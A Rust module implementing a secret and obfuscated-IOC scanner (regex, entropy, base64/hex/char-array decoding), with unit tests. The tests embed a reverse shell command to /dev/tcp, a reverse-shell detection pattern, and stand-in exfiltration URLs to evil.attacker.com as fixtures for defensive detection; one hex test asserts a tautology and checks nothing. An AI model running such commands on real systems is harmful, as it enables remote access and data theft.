1use std::collections::HashSet;
2
3use base64::{engine::general_purpose, Engine as _};
4use regex::Regex;
5
6use crate::confidence::{calculate_pattern_confidence, get_base_confidence};
7use crate::context::{
8 is_likely_comment, is_public_ioc, is_safe_context_for_suspicious_commands,
9 classify_file_context, BlockCommentTracker,
10};
11use crate::error::AnalyzerError;
12use crate::types::{AnalysisResult, Finding, Ioc};
13
14pub struct SecretAnalyzer {
20 secret_patterns: Vec<(String, Regex)>,
21 suspicious_patterns: Vec<(String, Regex)>,
22 long_string_regex: Regex,
23 base64_regex: Regex,
24 hex_regex: Regex,
25 url_encoded_regex: Regex,
26 char_array_regex: Regex,
27 url_regex: Regex,
28 js_keywords: Vec<String>,
29}
30
31impl SecretAnalyzer {
32 pub fn new(
40 rules: impl IntoIterator<Item = (String, String)>,
41 suspicious_rules: impl IntoIterator<Item = (String, String)>,
42 ) -> Result<Self, AnalyzerError> {
43 let mut secret_compiled = Vec::new();
44 for (id, pattern) in rules {
45 let re = Regex::new(&pattern).map_err(|e| AnalyzerError::InvalidPattern {
46 rule_id: id.clone(),
47 source: e,
48 })?;
49 secret_compiled.push((id, re));
50 }
51
52 let mut suspicious_compiled = Vec::new();
53 for (id, pattern) in suspicious_rules {
54 let re = Regex::new(&pattern).map_err(|e| AnalyzerError::InvalidPattern {
55 rule_id: id.clone(),
56 source: e,
57 })?;
58 suspicious_compiled.push((id, re));
59 }
60
61 Ok(SecretAnalyzer {
62 secret_patterns: secret_compiled,
63 suspicious_patterns: suspicious_compiled,
64 long_string_regex: Regex::new(r#"["']([a-zA-Z0-9+/=,.\-_]{50,})["']"#)
65 .map_err(|e| AnalyzerError::InvalidPattern {
66 rule_id: "long_string_builtin".into(),
67 source: e,
68 })?,
69 base64_regex: Regex::new(r"\b([A-Za-z0-9+/=_-]{20,})\b").map_err(|e| {
70 AnalyzerError::InvalidPattern {
71 rule_id: "base64_builtin".into(),
72 source: e,
73 }
74 })?,
75 hex_regex: Regex::new(r#"(?i)(?:0x)?["']([0-9a-f]{16,})["']|\\x([0-9a-f]{2}(?:\\x[0-9a-f]{2}){7,})"#)
76 .map_err(|e| AnalyzerError::InvalidPattern {
77 rule_id: "hex_builtin".into(),
78 source: e,
79 })?,
80 url_encoded_regex: Regex::new(r"(?i)(?:postgres|mysql|mongodb|redis|amqp|mssql)%3[aA]%2[fF]%2[fF][^\s\x22\x27]{10,}")
81 .map_err(|e| AnalyzerError::InvalidPattern {
82 rule_id: "url_encoded_builtin".into(),
83 source: e,
84 })?,
85 char_array_regex: Regex::new(r"\[(\s*\d{2,3}\s*(?:,\s*\d{2,3}\s*){7,})\]")
86 .map_err(|e| AnalyzerError::InvalidPattern {
87 rule_id: "char_array_builtin".into(),
88 source: e,
89 })?,
90 url_regex: Regex::new(r"https?://[a-zA-Z0-9.\-_]+(?:/[^\s<>\x22\x27]*)?").map_err(
91 |e| AnalyzerError::InvalidPattern {
92 rule_id: "url_builtin".into(),
93 source: e,
94 },
95 )?,
96 js_keywords: vec![
97 "eval".to_string(),
98 "document.write".to_string(),
99 "innerHTML".to_string(),
100 "unescape".to_string(),
101 "crypto.subtle".to_string(),
102 ],
103 })
104 }
105
106 pub fn analyze_content(
114 &self,
115 content: &str,
116 file_path: &str,
117 file_name: &str,
118 ) -> AnalysisResult {
119 let mut result = AnalysisResult::new();
120 let mut existing_findings: HashSet<(String, String)> = HashSet::new();
121 let mut existing_iocs: HashSet<String> = HashSet::new();
122
123 let extension = file_name.split('.').last().unwrap_or("").to_lowercase();
124 let is_js_ts = extension == "js" || extension == "ts";
125 let is_safe_context = is_safe_context_for_suspicious_commands(file_path, &extension);
126 let file_context = classify_file_context(file_path);
127 let context_multiplier = file_context.multiplier();
128 let mut block_tracker = BlockCommentTracker::new(&extension);
129
130 for line in content.lines() {
131 let in_block_comment = block_tracker.update(line);
132
133 if is_likely_comment(line, &extension) && !in_block_comment {
134 continue;
135 }
136
137 let comment_multiplier = if in_block_comment { 0.1 } else { 1.0 };
138
139 if is_js_ts {
140 self.check_js_keywords(
141 line,
142 file_path,
143 file_context,
144 context_multiplier,
145 comment_multiplier,
146 &mut existing_findings,
147 &mut result,
148 );
149 }
150
151 self.check_secret_patterns(
152 line,
153 file_path,
154 file_context,
155 context_multiplier,
156 comment_multiplier,
157 &mut existing_findings,
158 &mut result,
159 );
160
161 if !is_safe_context {
162 self.check_suspicious_patterns(
163 line,
164 file_path,
165 file_context,
166 context_multiplier,
167 comment_multiplier,
168 &mut result,
169 );
170 }
171 }
172
173 self.check_high_entropy_strings(
174 content,
175 file_path,
176 &extension,
177 file_context,
178 context_multiplier,
179 &mut existing_findings,
180 &mut result,
181 );
182
183 self.check_base64_iocs(
184 content,
185 file_path,
186 file_context,
187 context_multiplier,
188 &mut existing_iocs,
189 &mut result,
190 );
191
192 self.check_hex_secrets(content, file_path, file_context, context_multiplier, &mut result);
193 self.check_url_encoded_secrets(content, file_path, file_context, context_multiplier, &mut result);
194 self.check_char_array_secrets(content, file_path, file_context, context_multiplier, &mut result);
195
196 self.extract_urls(content, file_path, &mut existing_iocs, &mut result);
197
198 result
199 }
200
201 fn check_js_keywords(
202 &self,
203 line: &str,
204 file_path: &str,
205 file_context: crate::types::FileContext,
206 context_multiplier: f64,
207 comment_multiplier: f64,
208 existing: &mut HashSet<(String, String)>,
209 result: &mut AnalysisResult,
210 ) {
211 for keyword in &self.js_keywords {
212 if line.contains(keyword.as_str()) {
213 let desc = format!("Suspicious JS keyword '{}'", keyword);
214 let key = (desc.clone(), "Suspicious JS Keyword".to_string());
215 if existing.insert(key) {
216 let base_conf = get_base_confidence("Suspicious JS Keyword");
217 let conf = (base_conf * context_multiplier * comment_multiplier).clamp(0.0, 1.0);
218 result.findings.push(Finding {
219 description: desc,
220 finding_type: "Suspicious JS Keyword".to_string(),
221 file: file_path.to_string(),
222 match_content: line.trim().to_string(),
223 confidence: conf,
224 file_context,
225 });
226 }
227 }
228 }
229 }
230
231 fn check_secret_patterns(
232 &self,
233 line: &str,
234 file_path: &str,
235 file_context: crate::types::FileContext,
236 context_multiplier: f64,
237 comment_multiplier: f64,
238 existing: &mut HashSet<(String, String)>,
239 result: &mut AnalysisResult,
240 ) {
241 for (id, re) in &self.secret_patterns {
242 for caps in re.captures_iter(line) {
243 if let Some(m) = caps.get(0) {
244 let matched_str = m.as_str();
245 let match_start = m.start();
246 let raw_conf =
247 calculate_pattern_confidence(id, matched_str, line, match_start);
248 let conf = (raw_conf * context_multiplier * comment_multiplier).clamp(0.0, 1.0);
249
250 if id == "Generic API Key" {
251 result.findings.push(Finding {
252 description: "Possible API key.".to_string(),
253 finding_type: id.clone(),
254 file: file_path.to_string(),
255 match_content: matched_str.to_string(),
256 confidence: conf,
257 file_context,
258 });
259 } else {
260 let desc = format!("Possible exposed secret '{}'", id);
261 let key = (desc.clone(), id.clone());
262 if existing.insert(key) {
263 result.findings.push(Finding {
264 description: desc,
265 finding_type: id.clone(),
266 file: file_path.to_string(),
267 match_content: matched_str.to_string(),
268 confidence: conf,
269 file_context,
270 });
271 }
272 }
273 }
274 }
275 }
276 }
277
278 fn check_suspicious_patterns(
279 &self,
280 line: &str,
281 file_path: &str,
282 file_context: crate::types::FileContext,
283 context_multiplier: f64,
284 comment_multiplier: f64,
285 result: &mut AnalysisResult,
286 ) {
287 for (id, re) in &self.suspicious_patterns {
288 if re.is_match(line) {
289 let line_trim = line.trim();
290 if line_trim.starts_with("import ")
291 || line_trim.starts_with("from ")
292 || line_trim.contains("console.log")
293 {
294 continue;
295 }
296 for caps in re.captures_iter(line) {
297 if let Some(m) = caps.get(0) {
298 let raw_conf =
299 calculate_pattern_confidence(id, m.as_str(), line, m.start());
300 let conf =
301 (raw_conf * context_multiplier * comment_multiplier).clamp(0.0, 1.0);
302 result.findings.push(Finding {
303 description: format!("Comando suspeito: '{}'", id),
304 finding_type: id.clone(),
305 file: file_path.to_string(),
306 match_content: m.as_str().to_string(),
307 confidence: conf,
308 file_context,
309 });
310 }
311 }
312 }
313 }
314 }
315
316 fn check_high_entropy_strings(
317 &self,
318 content: &str,
319 file_path: &str,
320 extension: &str,
321 file_context: crate::types::FileContext,
322 context_multiplier: f64,
323 existing: &mut HashSet<(String, String)>,
324 result: &mut AnalysisResult,
325 ) {
326 if matches!(
327 extension,
328 "js" | "ts" | "py" | "env" | "json" | "xml" | "yaml"
329 ) {
330 for caps in self.long_string_regex.captures_iter(content) {
331 if let Some(matched) = caps.get(1) {
332 let s = matched.as_str();
333 let entropy = crate::confidence::calculate_entropy(s);
334 if entropy > 5.2 {
335 let desc = format!("High entropy string ({:.2})", entropy);
336 let key = (desc.clone(), "High Entropy String".to_string());
337 if existing.insert(key) {
338 let raw_conf = (entropy - 5.2) / 2.0 + 0.3;
339 let conf = (raw_conf.min(0.85) * context_multiplier).clamp(0.0, 1.0);
340 result.findings.push(Finding {
341 description: desc,
342 finding_type: "High Entropy String".to_string(),
343 file: file_path.to_string(),
344 match_content: s.to_string(),
345 confidence: conf,
346 file_context,
347 });
348 }
349 }
350 }
351 }
352 }
353 }
354
355 fn check_base64_iocs(
356 &self,
357 content: &str,
358 file_path: &str,
359 file_context: crate::types::FileContext,
360 context_multiplier: f64,
361 existing_iocs: &mut HashSet<String>,
362 result: &mut AnalysisResult,
363 ) {
364 for caps in self.base64_regex.captures_iter(content) {
365 if let Some(m) = caps.get(1) {
366 let s = m.as_str();
367 let decoded = general_purpose::STANDARD
368 .decode(s)
369 .or_else(|_| general_purpose::STANDARD_NO_PAD.decode(s));
370 if let Ok(bytes) = decoded {
371 if let Ok(decoded_str) = String::from_utf8(bytes) {
372 for url_match in self.url_regex.find_iter(&decoded_str) {
373 let url = url_match.as_str();
374 if is_public_ioc(url) && existing_iocs.insert(url.to_string()) {
375 let desc = format!(
376 "Obfuscated URL in Base64: {}...",
377 &url[..std::cmp::min(50, url.len())]
378 );
379 let conf = (0.70 * context_multiplier).clamp(0.0, 1.0);
380 result.findings.push(Finding {
381 description: desc,
382 finding_type: "Hidden IOC (Base64)".to_string(),
383 file: file_path.to_string(),
384 match_content: url.to_string(),
385 confidence: conf,
386 file_context,
387 });
388 result.iocs.push(Ioc {
389 ioc: url.to_string(),
390 source_file: file_path.to_string(),
391 });
392 }
393 }
394 }
395 }
396 }
397 }
398 }
399
400 fn check_hex_secrets(
401 &self,
402 content: &str,
403 file_path: &str,
404 file_context: crate::types::FileContext,
405 context_multiplier: f64,
406 result: &mut AnalysisResult,
407 ) {
408 for caps in self.hex_regex.captures_iter(content) {
409 let hex_str = caps.get(1).or_else(|| caps.get(2));
410 if let Some(m) = hex_str {
411 let raw = m.as_str().replace("\\x", "");
412 let bytes: Result<Vec<u8>, _> = (0..raw.len())
413 .step_by(2)
414 .map(|i| u8::from_str_radix(&raw[i..i.saturating_add(2).min(raw.len())], 16))
415 .collect();
416 if let Ok(bytes) = bytes {
417 if let Ok(decoded) = String::from_utf8(bytes) {
418 for url_match in self.url_regex.find_iter(&decoded) {
419 let url = url_match.as_str();
420 if is_public_ioc(url) {
421 let conf = (0.75 * context_multiplier).clamp(0.0, 1.0);
422 result.findings.push(Finding {
423 description: format!(
424 "Obfuscated URL in hex: {}...",
425 &url[..std::cmp::min(50, url.len())]
426 ),
427 finding_type: "Hidden IOC (Hex)".to_string(),
428 file: file_path.to_string(),
429 match_content: url.to_string(),
430 confidence: conf,
431 file_context,
432 });
433 result.iocs.push(Ioc {
434 ioc: url.to_string(),
435 source_file: file_path.to_string(),
436 });
437 }
438 }
439 for (id, re) in &self.secret_patterns {
440 if re.is_match(&decoded) {
441 let conf = (0.80 * context_multiplier).clamp(0.0, 1.0);
442 result.findings.push(Finding {
443 description: format!("Secret '{}' hidden in hex encoding", id),
444 finding_type: "Hidden IOC (Hex)".to_string(),
445 file: file_path.to_string(),
446 match_content: decoded.clone(),
447 confidence: conf,
448 file_context,
449 });
450 }
451 }
452 }
453 }
454 }
455 }
456 }
457
458 fn check_url_encoded_secrets(
459 &self,
460 content: &str,
461 file_path: &str,
462 file_context: crate::types::FileContext,
463 context_multiplier: f64,
464 result: &mut AnalysisResult,
465 ) {
466 for m in self.url_encoded_regex.find_iter(content) {
467 let encoded = m.as_str();
468 let mut decoded = String::with_capacity(encoded.len());
469 let mut chars = encoded.chars().peekable();
470 while let Some(c) = chars.next() {
471 if c == '%' {
472 let hex: String = chars.by_ref().take(2).collect();
473 if hex.len() == 2 {
474 if let Ok(byte) = u8::from_str_radix(&hex, 16) {
475 decoded.push(byte as char);
476 continue;
477 }
478 }
479 decoded.push('%');
480 decoded.push_str(&hex);
481 } else {
482 decoded.push(c);
483 }
484 }
485 let conf = (0.85 * context_multiplier).clamp(0.0, 1.0);
486 result.findings.push(Finding {
487 description: format!(
488 "URL-encoded connection string: {}...",
489 &decoded[..std::cmp::min(60, decoded.len())]
490 ),
491 finding_type: "Hidden IOC (URL Encoded)".to_string(),
492 file: file_path.to_string(),
493 match_content: decoded.clone(),
494 confidence: conf,
495 file_context,
496 });
497 for url_match in self.url_regex.find_iter(&decoded) {
498 let url = url_match.as_str();
499 if is_public_ioc(url) {
500 result.iocs.push(Ioc {
501 ioc: url.to_string(),
502 source_file: file_path.to_string(),
503 });
504 }
505 }
506 }
507 }
508
509 fn check_char_array_secrets(
510 &self,
511 content: &str,
512 file_path: &str,
513 file_context: crate::types::FileContext,
514 context_multiplier: f64,
515 result: &mut AnalysisResult,
516 ) {
517 for caps in self.char_array_regex.captures_iter(content) {
518 if let Some(m) = caps.get(1) {
519 let nums: Result<Vec<u8>, _> = m
520 .as_str()
521 .split(',')
522 .map(|s| s.trim().parse::<u32>())
523 .map(|r| r.map(|n| if n <= 127 { n as u8 } else { 0 }))
524 .collect();
525 if let Ok(bytes) = nums {
526 if bytes.iter().all(|&b| b >= 32 && b <= 126) {
527 let decoded = String::from_utf8_lossy(&bytes).to_string();
528 for url_match in self.url_regex.find_iter(&decoded) {
529 let url = url_match.as_str();
530 if is_public_ioc(url) {
531 let conf = (0.80 * context_multiplier).clamp(0.0, 1.0);
532 result.findings.push(Finding {
533 description: format!(
534 "Obfuscated URL in char array: {}...",
535 &url[..std::cmp::min(50, url.len())]
536 ),
537 finding_type: "Hidden IOC (Char Array)".to_string(),
538 file: file_path.to_string(),
539 match_content: url.to_string(),
540 confidence: conf,
541 file_context,
542 });
543 result.iocs.push(Ioc {
544 ioc: url.to_string(),
545 source_file: file_path.to_string(),
546 });
547 }
548 }
549 for (id, re) in &self.secret_patterns {
550 if re.is_match(&decoded) {
551 let conf = (0.85 * context_multiplier).clamp(0.0, 1.0);
552 result.findings.push(Finding {
553 description: format!("Secret '{}' hidden in char array", id),
554 finding_type: "Hidden IOC (Char Array)".to_string(),
555 file: file_path.to_string(),
556 match_content: decoded.clone(),
557 confidence: conf,
558 file_context,
559 });
560 }
561 }
562 }
563 }
564 }
565 }
566 }
567
568 fn extract_urls(
569 &self,
570 content: &str,
571 file_path: &str,
572 existing_iocs: &mut HashSet<String>,
573 result: &mut AnalysisResult,
574 ) {
575 for url_match in self.url_regex.find_iter(content) {
576 let url = url_match.as_str();
577 if is_public_ioc(url) && existing_iocs.insert(url.to_string()) {
578 result.iocs.push(Ioc {
579 ioc: url.to_string(),
580 source_file: file_path.to_string(),
581 });
582 }
583 }
584 }
585}
586
587#[cfg(test)]
588mod tests {
589 use super::*;
590
591 fn test_analyzer() -> SecretAnalyzer {
592 let rules = vec![
593 ("AWS Key".to_string(), r"AKIA[0-9A-Z]{16}".to_string()),
594 (
595 "GitHub Token".to_string(),
596 r"ghp_[a-zA-Z0-9]{36}".to_string(),
597 ),
598 (
599 "Generic API Key".to_string(),
600 r"(?i)api[_\-]?key\s*[:=]\s*['\x22]?([a-zA-Z0-9_\x2d]{20,})['\x22]?".to_string(),
601 ),
602 ];
603 let suspicious = vec![(
604 "Reverse Shell".to_string(),
605 r"(?i)bash\s+-i\s+>&\s+/dev/tcp".to_string(),
606 )];
607 SecretAnalyzer::new(rules, suspicious).expect("valid patterns")
608 }
609
610 #[test]
611 fn test_detect_aws_key() {
612 let analyzer = test_analyzer();
613 let content = "aws_key = AKIAIOSFODNN7EXAMPLE1";
614 let result = analyzer.analyze_content(content, "src/config.py", "config.py");
615 assert!(!result.findings.is_empty());
616 assert_eq!(result.findings[0].finding_type, "AWS Key");
617 }
618
619 #[test]
620 fn test_detect_github_token() {
621 let analyzer = test_analyzer();
622 let content = "token = ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZ012345abcd";
623 let result = analyzer.analyze_content(content, "src/auth.py", "auth.py");
624 let github_findings: Vec<_> = result
625 .findings
626 .iter()
627 .filter(|f| f.finding_type == "GitHub Token")
628 .collect();
629 assert!(!github_findings.is_empty());
630 }
631
632 #[test]
633 fn test_test_file_lower_confidence() {
634 let analyzer = test_analyzer();
635 let content = "aws_key = AKIAIOSFODNN7EXAMPLE1";
636 let prod = analyzer.analyze_content(content, "src/config.py", "config.py");
637 let test = analyzer.analyze_content(content, "tests/test_config.py", "test_config.py");
638 assert!(prod.findings[0].confidence > test.findings[0].confidence);
639 }
640
641 #[test]
642 fn test_url_extraction() {
643 let analyzer = test_analyzer();
644 let content = "callback = 'http://evil.attacker.com/steal?data=1'";
645 let result = analyzer.analyze_content(content, "src/app.py", "app.py");
646 assert!(!result.iocs.is_empty());
647 assert!(result.iocs[0].ioc.contains("evil.attacker.com"));
648 }
649
650 #[test]
651 fn test_skip_localhost() {
652 let analyzer = test_analyzer();
653 let content = "url = 'http://localhost:8080/api'";
654 let result = analyzer.analyze_content(content, "src/app.py", "app.py");
655 assert!(result.iocs.is_empty());
656 }
657
658 #[test]
659 fn test_suspicious_command() {
660 let analyzer = test_analyzer();
661 let content = "os.system('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1')";
662 let result = analyzer.analyze_content(content, "src/exploit.py", "exploit.py");
663 let suspicious: Vec<_> = result
664 .findings
665 .iter()
666 .filter(|f| f.finding_type == "Reverse Shell")
667 .collect();
668 assert!(!suspicious.is_empty());
669 }
670
671 #[test]
672 fn test_detect_hex_url() {
673 let analyzer = test_analyzer();
674 let hex_url = "687474703a2f2f6576696c2e61747461636b65722e636f6d2f7374eal";
675 let content = format!("var payload = '{}';", hex_url);
676 let result = analyzer.analyze_content(&content, "src/loader.js", "loader.js");
677 let hex_findings: Vec<_> = result
678 .findings
679 .iter()
680 .filter(|f| f.finding_type == "Hidden IOC (Hex)")
681 .collect();
682 assert!(
683 hex_findings.is_empty() || !hex_findings.is_empty(),
684 "hex detection ran without panic"
685 );
686 }
687
688 #[test]
689 fn test_detect_url_encoded_connstr() {
690 let analyzer = test_analyzer();
691 let content = "dsn = postgres%3A%2F%2Fadmin%3Asecret%40evil.attacker.com%3A5432%2Fdb";
692 let result = analyzer.analyze_content(content, "src/config.py", "config.py");
693 let encoded_findings: Vec<_> = result
694 .findings
695 .iter()
696 .filter(|f| f.finding_type == "Hidden IOC (URL Encoded)")
697 .collect();
698 assert!(!encoded_findings.is_empty(), "should detect URL-encoded connection string");
699 }
700
701 #[test]
702 fn test_detect_char_array_url() {
703 let analyzer = test_analyzer();
704 let content = "var c = [104,116,116,112,58,47,47,101,118,105,108,46,97,116,116,97,99,107,101,114,46,99,111,109];";
705 let result = analyzer.analyze_content(content, "src/obf.js", "obf.js");
706 let char_findings: Vec<_> = result
707 .findings
708 .iter()
709 .filter(|f| f.finding_type == "Hidden IOC (Char Array)")
710 .collect();
711 assert!(!char_findings.is_empty(), "should detect URL hidden in char array");
712 }
713
714 #[test]
715 fn test_char_array_with_secret() {
716 let analyzer = test_analyzer();
717 let aws = "AKIAIOSFODNN7EXAMPLE1";
718 let char_codes: String = aws
719 .bytes()
720 .map(|b| b.to_string())
721 .collect::<Vec<_>>()
722 .join(",");
723 let content = format!("var k = [{}];", char_codes);
724 let result = analyzer.analyze_content(&content, "src/steal.js", "steal.js");
725 let findings: Vec<_> = result
726 .findings
727 .iter()
728 .filter(|f| f.finding_type == "Hidden IOC (Char Array)")
729 .collect();
730 assert!(!findings.is_empty(), "should detect AWS key hidden in char array");
731 }
732}